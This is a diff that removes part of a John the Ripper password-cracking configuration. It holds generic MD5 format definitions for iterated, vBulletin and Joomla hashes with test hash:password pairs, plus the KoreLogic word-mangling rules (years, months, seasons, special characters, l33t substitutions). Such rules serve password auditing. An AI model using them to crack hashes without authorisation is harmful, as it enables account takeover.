-# NOTE, this format does NOT work on SSE2.  It requires a md5() of a 64 byte string.
-# SSE (or MMX) is limtited to 54 byte max password, due to 'enhancements'
-# Thus, we need a non-sse2 safe flag.
-Flag=MGF_NOTSSE2Safe
-Flag=MGF_KEYS_INPUT
-# here is the optimized 'script' to perform hash 'like' IPB but salt replaced with password.
-Func=MD5GenBaseFunc__crypt
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output_to_input2_as_base16
-Func=MD5GenBaseFunc__append_from_last_output_to_input2_as_base16
-Func=MD5GenBaseFunc__crypt_in2_to_out1
-# These are test strings for this format.
-Test=md5_gen(1003)478b10974f15e7295883224fd286ccba:test1
-Test=md5_gen(1003)18a59101e6c6fb38260d542a394ecb22:thatsworking
-Test=md5_gen(1003)630b01b68b6db6fd43a751f8147d1faf:test3
-
-####################################################################
-# Simple GENERIC-MD5 type for md5($p)^^6  (i.e. 6 steps of md5 recursively)
-####################################################################
-[List.Generic:md5_gen(1004)]
-# expression shown will be the string:   md5_gen(1004) md5(md5(md5(md5(md5(md5($p))))))
-Expression=md5(md5(md5(md5(md5(md5($p))))))
-Flag=MGF_KEYS_INPUT
-# here is the optimized 'script' to perform the md5 6 times on itself.
-Func=MD5GenBaseFunc__crypt
-Func=MD5GenBaseFunc__clean_input2
-Func=MD5GenBaseFunc__append_from_last_output_to_input2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt_in2_to_out1
-# These are test strings for this format.
-Test=md5_gen(1004)de1b991dd27fb9813e88b957a455dccd:test1
-Test=md5_gen(1004)6a62cd3c4d81139f61fb2553cdef0dc7:thatsworking
-Test=md5_gen(1004)a977990e521c5d1d17c6d65fdf2681b4:test3
-
-
-####################################################################
-# Simple GENERIC-MD5 type for md5($p)^^7  (i.e. 7 steps of md5 recursively)
-####################################################################
-[List.Generic:md5_gen(1005)]
-# expression shown will be the string:   md5_gen(1005) md5(md5(md5(md5(md5(md5(md5($p)))))))
-Expression=md5(md5(md5(md5(md5(md5(md5($p)))))))
-Flag=MGF_KEYS_INPUT
-# here is the optimized 'script' to perform the md5 7 times on itself.
-Func=MD5GenBaseFunc__crypt
-Func=MD5GenBaseFunc__clean_input2
-Func=MD5GenBaseFunc__append_from_last_output_to_input2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt_in2_to_out1
-# These are test strings for this format.
-Test=md5_gen(1005)784c527d0d92873ff9c0773e1c35621d:test1
-Test=md5_gen(1005)efcbbe6331caecf0e7f40160e65aadcc:thatsworking
-Test=md5_gen(1005)abb8bdd2c6ac2dfea2b2af6f5aed5446:test3
-
-####################################################################
-# Simple GENERIC-MD5 type for md5($p)^^8  (i.e. 8 steps of md5 recursively)
-####################################################################
-[List.Generic:md5_gen(1006)]
-# expression shown will be the string:   md5_gen(1006) md5(md5(md5(md5(md5(md5(md5(md5($p))))))))
-Expression=md5(md5(md5(md5(md5(md5(md5(md5($p))))))))
-Flag=MGF_KEYS_INPUT
-# here is the optimized 'script' to perform the md5 8 times on itself.
-Func=MD5GenBaseFunc__crypt
-Func=MD5GenBaseFunc__clean_input2
-Func=MD5GenBaseFunc__append_from_last_output_to_input2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt2
-Func=MD5GenBaseFunc__clean_input2_kwik
-Func=MD5GenBaseFunc__append_from_last_output2_as_base16
-Func=MD5GenBaseFunc__crypt_in2_to_out1
-# These are test strings for this format.
-Test=md5_gen(1006)1ec1f32398f64cab51183f63630eceea:test1
-Test=md5_gen(1006)f66b339ac21d6fd6af216f2b70aab2c9:thatsworking
-Test=md5_gen(1006)e9d38522b5eeec753332e576e2e0fe5d:test3
-
-####################################################################
-# Simple GENERIC-MD5 type for vBulletin md5(md5($p).$s)   Included here to 'exercise' the script parser
-####################################################################
-[List.Generic:md5_gen(1007)]
-# expression shown will be the string:   md5_gen(1007) md5(md5($p).$s) [vBulletin]
-Expression=md5(md5($p).$s) [vBulletin]
-# Flag needed here, is Salt.  There is no 'fixed' saltlen.
-Flag=MGF_SALTED
-Flag=MGF_ColonNOTValid
-Flag=MGF_KEYS_BASE16_IN1
-# vBulletin has a 'fixed' 3 byte salt, so list the fixed size
-SaltLen=3
-ColonChar=;
-# here is the optimized 'script' to perform vBulletin hash
-Func=MD5GenBaseFunc__set_input_len_32
-Func=MD5GenBaseFunc__append_salt
-Func=MD5GenBaseFunc__crypt
-# NOTE, vBulletin is setup to 'override' the ':'.  USUALLY, it is good to use something
-# outside of the ASCII values from 0x20 to 0x7F.  0x1F is a 'good' choice, but it will
-# cause john.conf to have a 'non-normal' ASCII char.  Thus for this 'simple' example, I
-# have used the ';' character.  NOTE this would have the same 'problems' as the ':' character
-# if used for real, since ; is also a valid character within the salt of vBulletin.
-# NOTE to run, you MUST use the command line switch:   -field-separator-char=;
-Test=md5_gen(1007)daa61d77e218e42060c2fa198ac1feaf$SXB;test1
-Test=md5_gen(1007)de56b00bb15d6db79204bd44383469bc$T &;thatsworking
-Test=md5_gen(1007)fb685c6f469f6e549c85e4c1fb5a65a6$\\H:;test3
-
-####################################################################
-# Simple GENERIC-MD5 type for joomla md5($p.$s)   Included here to 'exercise' the script parser
-####################################################################
-[List.Generic:md5_gen(1008)]
-# expression shown will be the string:   md5_gen(1008) md5($p.$s) [joomla]
-Expression=md5($p.$s) [joomla]
-# Flag needed here, is Salt.  There is no 'fixed' saltlen.
-Flag=MGF_SALTED
-# here is the optimized 'script' to perform the md5 8 times on itself.
-Func=MD5GenBaseFunc__clean_input
-Func=MD5GenBaseFunc__append_keys
-Func=MD5GenBaseFunc__append_salt
-Func=MD5GenBaseFunc__crypt
-Test=md5_gen(1008)ed52af63d8ecf0c682442dfef5f36391$1aDNNojYGSc7pSzcdxKxhbqvLtEe4deG:test1
-Test=md5_gen(1008)4fa1e9d54d89bfbe48b4c0f0ca0a3756$laxcaXPjgcdKdKEbkX1SIjHKm0gfYt1c:thatsworking
-Test=md5_gen(1008)82568eeaa1fcf299662ccd59d8a12f54$BdWwFsbGtXPGc0H1TBxCrn0GasyAlJBJ:test3
-
-
-[List.Rules:KoreLogicRules]
-
-;[List.Rules:KoreLogicRulesPrependNumNum]
-[c:] \p[c:] A0"[0-9][0-9]"
-
-;[List.Rules:KoreLogicRulesPrependYears]
-A0"20[0-1][0-9]"
-A0"19[3-9][0-9]"
-
-# Notice: Your wordlist should likely be all lowercase - or you are wasting work
-;[List.Rules:KoreLogicRulesAppendYears]
-[c:] \p[c:] Az"19[0-9][0-9]" <+
-[c:] \p[c:] Az"20[01][0-9]" <+
-
-;[List.Rules:KoreLogicRulesPrependNumNumNum]
-[c:] \p[c:] A0"[0-9][0-9][0-9]"
-
-;[List.Rules:KoreLogicRulesMonthsFullPreface]
-[:c] A0"\p[jJ]anuary"
-[:c] A0"\p[fF]ebruary"
-[:c] A0"\p[mM]arch"
-[:c] A0"\p[aA]pril"
-[:c] A0"\p[mM]ay"
-[:c] A0"\p[jJ]uner"
-[:c] A0"\p[jJ]uly"
-[:c] A0"\p[aA]ugust"
-[:c] A0"\p[sS]eptember"
-[:c] A0"\p[oO]ctober"
-[:c] A0"\p[nN]ovember"
-[:c] A0"\p[dD]ecember"
-
-;[List.Rules:KoreLogicRulesPrepend4LetterMonths]
-## Preface each dictionary with Janu janu Febr febr
-[:c] A0"\p[jJ]anu"
-[:c] A0"\p[fF]ebr"
-[:c] A0"\p[mM]arc"
-[:c] A0"\p[aA]pr"
-[:c] A0"\p[mM]ay"
-[:c] A0"\p[jJ]une"
-[:c] A0"\p[jJ]uly"
-[:c] A0"\p[Aa]ugu"
-[:c] A0"\p[sS]ept"
-[:c] A0"\p[oO]cto"
-[:c] A0"\p[nN]ove"
-[:c] A0"\p[Dd]ece"
-
-# Use this rule with 2EVERYTHING.dic or 3EVERYTHING.dic
-;[List.Rules:KoreLogicRulesPrependSeason]
-A0"[Ss$][uU][mM][mM][eE3][rR]"
-A0"[Ww][iI|][nN][tT+][eE3][rR]"
-A0"[Ff][aA][lL][lL]"
-A0"[Ss][pP][rR][iI][nN][gG]"
-A0"[Aa][uU][tT][uU][mM][nN]"
-
-# Use this rule with 2EVERYTHING.dic or 3EVERYTHING.dic
-;[List.Rules:KoreLogicRulesAppendSeason]
-<* Az"[Ss$][uU][mM][mM][eE3][rR]"
-<* Az"[Ww][iI|][nN][tT+][eE3][rR]"
-<* Az"[Ff][aA][lL][lL]"
-<* Az"[Ss][pP][rR][iI][nN][gG]"
-<* Az"[Aa][uU][tT][uU][mM][nN]"
-
-;[List.Rules:KoreLogicRulesPrependHello]
-A0"[hH][eE][lL][lL][oO0]"
-
-# Notice how we
-# 1) do caps first b/c they are more common in 'complex' environments
-# 2) Do !$@#%. first b/c they are the most common special chars
-;[List.Rules:KoreLogicRulesAppendCurrentYearSpecial]
-[c:] \p[c:] Az"201[0-9][!$@#%.]" <+
-[c:] \p[c:] Azq201[0-9][^&()_+\-={}|[\]\\;'":,/<>?`~*]q <+
-
-;[List.Rules:KoreLogicRulesPrependSpecialSpecial]
-[c:] \p[c:] A0q[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
-
-;[List.Rules:KoreLogicRulesAppend2Letters]
-<- Az"[a-z][a-z]"
-c <- Az"[A-Z][A-Z]"
-c <- Az"[a-z][A-Z]"
-c <- Az"[A-Z][a-z]"
-
-# Append numbers - but limit the total length.
-;[List.Rules:KoreLogicRulesAddJustNumbers]
-[c:] <* >1 \p[c:] $[0-9]
-[c:] <* >1 \p[c:] ^[0-9]
-[c:] <- >1 \p[c:] Az"[0-9][0-9]"
-[c:] <- >1 \p[c:] A0"[0-9][0-9]"
-[c:] >1 \p[c:] Az"[0-9][0-9][0-9]" <+
-# Redundant with KoreLogicRulesAppend4Num
-;-[c:] >1 \p[c:] Az"[0-9][0-9][0-9][0-9]" <+
-
-;[List.Rules:KoreLogicRulesDevProdTestUAT]
-\r[::cc] <* A\p\r[0l0l]"dev" \p\r[::TT]\p\r[::0l]
-\r[::cc] <* A\p\r[0l0l]"uat" \p\r[::TT]\p\r[::0l]
-\r[::cc] <* A\p\r[0l0l]"prod" \p\r[::TT]\p\r[::0l]
-\r[::cc] <* A\p\r[0l0l]"test" \p\r[::TT]\p\r[::0l]
-
-;[List.Rules:KoreLogicRulesPrependAndAppendSpecial]
-[c:] <- \p[c:] ^[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] $[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]
-
-# Redundant with KoreLogicRulesAddJustNumbers and KoreLogicRulesAppend4Num
-;[List.Rules:KoreLogicRulesAppendJustNumbers]
-;-[c:] <* \p[c:] $[0-9]
-;-[c:] <- \p[c:] Az"[0-9][0-9]"
-;-[c:] \p[c:] Az"[0-9][0-9][0-9]" <+
-;-[c:] \p[c:] Az"[0-9][0-9][0-9][0-9]" <+
-
-;[List.Rules:KoreLogicRulesAppendNumbers_and_Specials_Simple]
-# cap first letter then add a 0  2 6 9 ! *  to the end
-[c:] <* \p[c:] $[0-9!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]
-# cap first letter then add a special char - THEN a number  !0 %9 !9 etc
-[c:] <- \p[c:] Azq[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9]q
-# Cap the first letter - then add 0? 0! 5_ .. 9!
-## add NUMBER then SPECIAL    1! .. 9?
-[c:] <- \p[c:] Azq[0-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
-## Add Number Number Special
-;-[c:] \p[c:] Azq[0-9][0-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q <+
-## Add Special Number Number
-;-[c:] \p[c:] Azq[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9][0-9]q <+
-# Add 100! ... 999! to the end
-;-[c:] \p[c:] Azq[0-9][0-9][0-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q <+
-
-;[List.Rules:KoreLogicRulesAppendJustSpecials]
-[c:] <* \p[c:] $[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]
-[c:] <- \p[c:] Azq[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
-
-;[List.Rules:KoreLogicRulesAddShortMonthsEverywhere]
-<* >\r[00123456789] A\p[z0-9]"[jJ][aA][nN]"
-<* >\r[00123456789] A\p[z0-9]"[fF][eE][bB]"
-<* >\r[00123456789] A\p[z0-9]"[mM][aA][rRyY]"
-<* >\r[00123456789] A\p[z0-9]"[aA][pP][rR]"
-<* >\r[00123456789] A\p[z0-9]"[jJ][uU][nNlL]"
-<* >\r[00123456789] A\p[z0-9]"[aA][uU][gG]"
-<* >\r[00123456789] A\p[z0-9]"[sS][eE][pP]"
-<* >\r[00123456789] A\p[z0-9]"[oO][cC][tT]"
-<* >\r[00123456789] A\p[z0-9]"[nN][oO][vV]"
-<* >\r[00123456789] A\p[z0-9]"[dD][eE][cC]"
-
-# this will add the string '2010' at all places in the word:
-# USE this with a 4 or 5 char dictionary file with ALL characters
-# soo abcde will become
-# 2010abcde  a2010bcde  ab2010cde  acd2010de  abcd2010e  abcde2010
-;[List.Rules:KoreLogicRulesAdd2010Everywhere]
-<* >\r[00123456789] A\p[z0-9]"201[0-9]"
-
-;[List.Rules:KoreLogicRulesAdd1234_Everywhere]
-<* >\r[00123456789] A\p[z0-9]"1234"
-
-;[List.Rules:KoreLogicRulesAppendMonthDay]
-[:c] <* Az"\p[jJ]anuary"
-[:c] Az"\p[jJ]anuary[0-9]" <+
-[:c] Az"\p[jJ]anuary[0-9][0-9]" <+
-[:c] <* Az"\p[fF]ebruary"
-[:c] Az"\p[fF]ebruary[0-9]" <+
-[:c] Az"\p[fF]ebruary[0-9][0-9]" <+
-[:c] Az"\p[mM]arch"
-[:c] Az"\p[mM]arch[0-9]" <+
-[:c] Az"\p[mM]arch[0-9][0-9]" <+
-[:c] <* Az"\p[aA]pril"
-[:c] Az"\p[aA]pril[0-9]" <+
-[:c] Az"\p[aA]pril[0-9][0-9]" <+
-[:c] <* Az"\p[mM]ay"
-[:c] Az"\p[mM]ay[0-9]" <+
-[:c] Az"\p[mM]ay[0-9][0-9]" <+
-[:c] <* Az"\p[jJ]une"
-[:c] Az"\p[jJ]une[0-9]" <+
-# There was a typo in Kore's original revision of this rule
-[:c] Az"\p[jJ]une[0-9][0-9]" <+
-[:c] <* Az"\p[jJ]uly"
-[:c] Az"\p[jJ]uly[0-9]" <+
-[:c] Az"\p[jJ]uly[0-9][0-9]" <+
-[:c] <* Az"\p[aA]ugust"
-[:c] Az"\p[aA]ugust[0-9]" <+
-[:c] Az"\p[aA]ugust[0-9][0-9]" <+
-[:c] <* Az"\p[sS]eptember"
-[:c] Az"\p[sS]eptember[0-9]" <+
-# There was a typo in Kore's original revision of this rule
-[:c] Az"\p[sS]eptember[0-9][0-9]" <+
-[:c] <* Az"\p[oO]ctober"
-[:c] Az"\p[oO]ctober[0-9]" <+
-[:c] Az"\p[oO]ctober[0-9][0-9]" <+
-[:c] <* Az"\p[nN]ovember"
-[:c] Az"\p[nN]ovember[0-9]" <+
-[:c] Az"\p[nN]ovember[0-9][0-9]" <+
-[:c] <* Az"\p[dD]ecember"
-[:c] Az"\p[dD]ecember[0-9]" <+
-[:c] Az"\p[dD]ecember[0-9][0-9]" <+
-
-;[List.Rules:KoreLogicRulesAppendMonthCurrentYear]
-[:c] <* Az"\p[jJ]an201[0-9]"
-[:c] <* Az"\p[fF]eb201[0-9]"
-[:c] <* Az"\p[mM]ar201[0-9]"
-[:c] <* Az"\p[aA]pr201[0-9]"
-[:c] <* Az"\p[mM]ay201[0-9]"
-[:c] <* Az"\p[jJ]un201[0-9]"
-[:c] <* Az"\p[jJ]ul201[0-9]"
-[:c] <* Az"\p[Aa]ug201[0-9]"
-[:c] <* Az"\p[sS]ep201[0-9]"
-[:c] <* Az"\p[oO]ct201[0-9]"
-[:c] <* Az"\p[nN]ov201[0-9]"
-[:c] <* Az"\p[Dd]ec201[0-9]"
-
-;[List.Rules:KoreLogicRulesReplaceNumbers2Special]
-/[1-90] s\0\p[!@#$%^&*()]
-/1 /[2-90] s1! s\0\p[@#$%^&*()]
-/2 /[3-90] s2@ s\0\p[#$%^&*()]
-/3 /[4-90] s3# s\0\p[$%^&*()]
-/4 /[5-90] s4$ s\0\p[%^&*()]
-/5 /[6-90] s5% s\0\p[^&*()]
-/6 /[7-90] s6^ s\0\p[&*()]
-/7 /[890] s7& s\0\p[*()]
-/8 /[90] s8* s\0\p[()]
-/9 /0 s9( s0)
-
-;[List.Rules:KoreLogicRulesReplaceNumbers]
-/0 s0[1-9]
-/1 s1[02-9]
-/2 s2[013-9]
-/3 s3[0-24-9]
-/4 s4[0-35-9]
-/5 s5[0-46-9]
-/6 s6[0-57-9]
-/7 s7[0-68-9]
-/8 s8[0-79]
-/9 s9[0-8]
-# 10 lines above can be replaced with just one:
-# /[0-9] s\0[0-9] Q
-# but it's slower (generates, then rejects some duplicates).
-
-# This is a lamer/faster version of --rules:nt
-;[List.Rules:KoreLogicRulesReplaceLettersCaps]
-c /[a-z] s\0\p[A-Z]
-
-;[List.Rules:KoreLogicRulesAddDotCom]
-[c:] <- \p[c:] Az".com"
-[c:] <- \p[c:] Az".net"
-[c:] <- \p[c:] Az".org"
-
-;[List.Rules:KoreLogicRulesPrependJustSpecials]
-[c:] \p[c:] ^[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]
-[c:] \p[c:] A0q[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
-
-;[List.Rules:KoreLogicRulesAppend1_AddSpecialEverywhere]
-[c:] >4 <- \p[c:] i[0-5][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] $1
-[c:] >[5-8] <- \p1[c:] i\p2[6-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] $1
-
-;[List.Rules:KoreLogicRulesAppendNum_AddSpecialEverywhere]
-# This should probably use $[02-9] since we try $1 in
-# KoreLogicRulesAppend1_AddSpecialEverywhere
-[c:] >4 <- \p[c:] i[0-5][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] $[0-9]
-[c:] >[5-8] <- \p1[c:] i\p2[6-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] $[0-9]
-
-;[List.Rules:KoreLogicRulesAppendNumNum_AddSpecialEverywhere]
-[c:] >4 \p[c:] i[0-5][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] Az"[0-9][0-9]" <+
-[c:] >[5-8] \p1[c:] i\p2[6-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] Az"[0-9][0-9]" <+
-
-;[List.Rules:KoreLogicRulesAppendNumNumNum_AddSpecialEverywhere]
-[c:] >4 \p[c:] i[0-5][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] Az"[0-9][0-9][0-9]" <+
-[c:] >[5-8] \p1[c:] i\p2[6-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] Az"[0-9][0-9][0-9]" <+
-
-;[List.Rules:KoreLogicRulesAppendYears_AddSpecialEverywhere]
-[c:] >4 \p[c:] i[0-5][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] Az"19[4-9][0-9]" <+
-[c:] >4 \p[c:] i[0-5][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] Az"20[0-1][0-9]" <+
-[c:] >[5-8] \p1[c:] i\p2[6-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] Az"19[4-9][0-9]" <+
-[c:] >[5-8] \p1[c:] i\p2[6-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] Az"20[0-1][0-9]" <+
-
-# This rule needs work actually --- you have to 'sort -u' its output    rick
-# /a = reject if it doesnt have an 'a'
-# the [:c] does waste some effort - and generate dupes. This is wasteful,
-# but I want to keep it in b/c the original crack/JtR rules use it.
-;[List.Rules:KoreLogicRulesL33t]
-[:c] /\r[aaAAbBeEiiiIIIllll] s\0\r\p[@44@88331!|1!|17|!] \p1[:M] \p1[:c] \p1[:Q]
-# The following line differs from Kore's erroneous 4 lines:
-[:c] /\r[LLLL] s\0\r\p[17|!] \p1[:M] \p1[:c] \p1[:Q]
-#/Lsl1[:c]
-#/Lsl7[:c]
-#/Lsl|[:c]
-#/Lsl![:c]
-[:c] /\r[oOssSStT1111003344557788] s\0\r\p[00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-# Full set (same as above, but on one line):
-#-[:c] /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT1111003344557788] s\0\r\p[@44@88331!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-# Double substitutions start here.
-# Compared to Kore's, we check for both chars first, then replace both.
-# This produces different results from Kore's, which would replace all
-# instances of the first char before checking for the second.
-# Kore's behavior may be restored by moving "sa[@4]" to be right after "/a"
-# on the line below, and ditto for further lines.
-[:c] /a /\r[AAbBeEiiiIIIllllLLLLoOssSStT1111003344557788] sa[@4] s\2\r\p2[4@88331!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-# Kore had these (probably unintentionally, so we don't duplicate them):
-#/asa4/4s4a[:c]
-#/asa4/4s4A[:c]
-[:c] /A /\r[aabBeEiiiIIIllllLLLLoOssSStT1111003344557788] sA4 s\0\r\p[@488331!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-# Kore also had these, but (intentionally?) missed sb8 on this set (after sA4)
-#/AsA4/4s4a[:c]
-#/AsA4/4s4A[:c]
-[:c] /b /\r[aaAABeEiiiIIIllllLLLLoOssSStT1111003344557788] sb8 s\0\r\p[@44@8331!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /B /\r[aaAAbeEiiiIIIllllLLLLoOssSStT1111003344557788] sB8 s\0\r\p[@44@8331!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /e /\r[aaAAbBEiiiIIIllllLLLLoOssSStT1111003344557788] se3 s\0\r\p[@44@8831!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /E /\r[aaAAbBeiiiIIIllllLLLLoOssSStT1111003344557788] sE3 s\0\r\p[@44@8831!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /i /\r[aaAAbBeEIIIllllLLLLoOssSStT1111003344557788] si[1!|] s\2\r\p2[@44@88331!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /I /\r[aaAAbBeEiiillllLLLLoOssSStT1111003344557788] sI[1!|] s\2\r\p2[@44@88331!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-# Kore's rules only included sl[17|], but not sl!
-[:c] /l /\r[aaAAbBeEiiiIIILLLLoOssSStT1111003344557788] sl[17|!] s\2\r\p2[@44@88331|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-# All "/L" rules (171 lines) were buggy
-[:c] /L /\r[aaAAbBeEiiiIIIlllloOssSStT1111003344557788] sl[17|!] s\2\r\p2[@44@88331|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /o /\r[aaAAbBeEiiiIIIllllLLLLOssSStT1111003344557788] so0 s\0\r\p[@44@88331!|1!|17|!17|!0$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /O /\r[aaAAbBeEiiiIIIllllLLLLossSStT1111003344557788] sO0 s\0\r\p[@44@88331!|1!|17|!17|!0$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /s /\r[aaAAbBeEiiiIIIllllLLLLoOSStT1111003344557788] ss[$5] s\2\r\p2[@44@88331!|1!|17|!17|!00$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /S /\r[aaAAbBeEiiiIIIllllLLLLoOsstT1111003344557788] sS[$5] s\2\r\p2[@44@88331!|1!|17|!17|!00$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /t /\r[aaAAbBeEiiiIIIllllLLLLoOssSST1111003344557788] st+ s\0\r\p[@44@88331!|1!|17|!17|!00$5$5+!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /T /\r[aaAAbBeEiiiIIIllllLLLLoOssSSt1111003344557788] sT+ s\0\r\p[@44@88331!|1!|17|!17|!00$5$5+!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /1 /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT003344557788] s1[!iI|] s\2\r\p2[@44@88331!|1!|17|!17|!00$5$5++oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /0 /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT11113344557788] s0[oO] s\2\r\p2[@44@88331!|1!|17|!17|!00$5$5++!iI|eEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /3 /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT11110044557788] s3[eE] s\2\r\p2[@44@88331!|1!|17|!17|!00$5$5++!iI|oOaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-#-[:c] /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT1111003344557788] s\0\r\p[@44@88331!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /4 /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT11110033557788] s4[aA] s\2\r\p2[@44@88331!|1!|17|!17|!00$5$5++!iI|oOeEsSlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /5 /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT11110033447788] s5[sS] s\2\r\p2[@44@88331!|1!|17|!17|!00$5$5++!iI|oOeEaAlLbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /7 /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT11110033445588] s7[lL] s\2\r\p2[@44@88331!|1!|17|!17|!00$5$5++!iI|oOeEaAsSbB] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /8 /\r[aaAAbBeEiiiIIIllllLLLLoOssSStT11110033445577] s8[bB] s\2\r\p2[@44@88331!|1!|17|!17|!00$5$5++!iI|oOeEaAsSlL] \p1[:M] \p1[:c] \p1[:Q]
-# These are some popular triple/quad l33t rules
-[:c] /a /e /[los] sa4 se3 s\0\p[10$] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /[ae] /l /[os] s\2\p2[43] sl1 s\3\p3[0$] \p1[:M] \p1[:c] \p1[:Q]
-[:c] /[ae] /o /s s\2\p2[43] so0 ss$ \p1[:M] \p1[:c] \p1[:Q]
-[:c] /l /o /s sl1 so0 ss$ \p1[:M] \p1[:c] \p1[:Q]
